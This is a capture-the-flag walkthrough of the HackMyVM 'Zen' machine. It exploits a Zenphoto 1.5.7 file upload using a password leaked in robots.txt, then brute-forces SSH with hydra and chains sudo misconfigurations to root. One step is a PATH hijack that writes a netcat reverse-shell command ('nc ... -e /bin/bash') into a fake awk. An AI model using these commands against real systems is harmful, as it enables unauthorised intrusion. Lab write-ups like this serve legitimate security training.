HackMyVm Zen Walkthrough

HackMyVm Zen Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100  
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
 |   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
 |_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 9 disallowed entries
 | /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
 |_/zp-data/ /page/search/ /uploaded/ /backup/
 |_http-server-header: nginx/1.14.2
 |_http-title: Galer\xC3\xADa
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel    

From main page, get the app name and version number.

```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->


Google the zenphoto version 1.5.7, we know it has upload vulnerability.
         Authenticated arbitrary file upload to RCE

Product : Zenphoto
Affected : Zenphoto CMS - <= 1.5.7
Attack Type : Remote

login then go to plugins then go to uploader and press on the check box elFinder
then press apply , after that you go to upload then Files(elFinder) drag and drop
any malicious php code after that go to /uploaded/ and you're php code


Zenphoto through 1.5.7 is affected by authenticated arbitrary file
upload, leading to remote code execution. The attacker must navigate to
the uploader plugin, check the elFinder box, and then drag and drop
files into the Files(elFinder) portion of the UI. This can, for
example, place a .php file in the server's uploaded/ directory.

[Reference]
https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
https://twitter.com/3almisfer
https://github.com/azizalshammari/


From robots.txt, found a strange string: P@ssw0rd.

Find the login panel of zenphoto at /zp-core/admin.php, login with admin:P@ssw0rd.

Upload a php shell and get reverse shell.

```bash
 & kali @ mykali in ~/Documents/zen 0 [13:57:14]
 ~ nc -nlvp 1234        
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38120.
 Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
  20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~/Documents/zen 0 [14:05:51]
 ~ curl http://192.168.56.99/backup/r.php

Found 3 users in home folder.

www-data@zen:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
 drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
 drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
 drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
 drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster

Because we can found no way to escalate to anyone of these 3 users, so we can only bruteforce ssh credentials.

 ~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F                                       ...
 [DATA] attacking ssh://192.168.56.99:22/
 [22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster

Login as zenmaster, escalate to kodo.

```bash
enmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p


As user kodo, check sudo -l. Use the edit function, and press !:/bin/bash, escalate to user 

 ```bash
kodo@zen:/home/zenmaster$ sudo -l
 Matching Defaults entries for kodo on zen:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User kodo may run the following commands on zen:
     (hua) NOPASSWD: /usr/bin/see
 kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
 kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
 hua@zen:/home/zenmaster$ id
 uid=1002(hua) gid=1002(hua) groups=1002(hua)

Check sudo -l.

```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen


 We can write to /use/local/bin.

 ```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null  
 ...
 /tmp/.X11-unix
 /usr/local/bin
 /usr/lib/systemd/system/mountnfs-bootclean.service
 ...

Use strace to track add-shell, it calls awk, cat, rm from /usr/local/bin, which don't exist.

```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory


Then we can write a shell code in awk, and get root shell.

 ```bash
hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
 hua@zen:/tmp$ chmod +x /usr/local/bin/awk
 hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 & kali @ mykali in ~ 0 [15:25:33]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.99.
 Ncat: Connection from 192.168.56.99:38124.
 id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 zen

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注